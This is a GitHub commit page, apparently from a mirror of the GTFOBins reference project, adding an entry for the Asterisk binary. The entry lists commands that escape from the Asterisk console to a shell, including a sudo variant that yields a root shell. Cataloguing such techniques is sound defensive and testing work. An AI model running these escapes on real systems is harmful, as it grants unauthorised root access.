1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-01 13:11:40 +01:00

Merge f29e143475a9ee6616df0bfb65019188b61abb40 into b29f2cfde1c72e4ea5191e49604e923bbda98461

This commit is contained in:
Valentin Lobstein 2025-09-28 17:20:41 +08:00 committed by GitHub
commit 0a3991e901
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

18
_gtfobins/asterisk.md Normal file

@ -0,0 +1,18 @@
---
functions:
shell:
- description: Connect to the Asterisk console and drop into a shell
code: |
asterisk -r
code: |
!sh
sudo:
- description: Start Asterisk as root in the foreground to create its CLI socket
code: |
sudo asterisk -F
- description: Connect to the Asterisk console as root and drop into a shell
code: |
sudo asterisk -r
code: |
!sh
---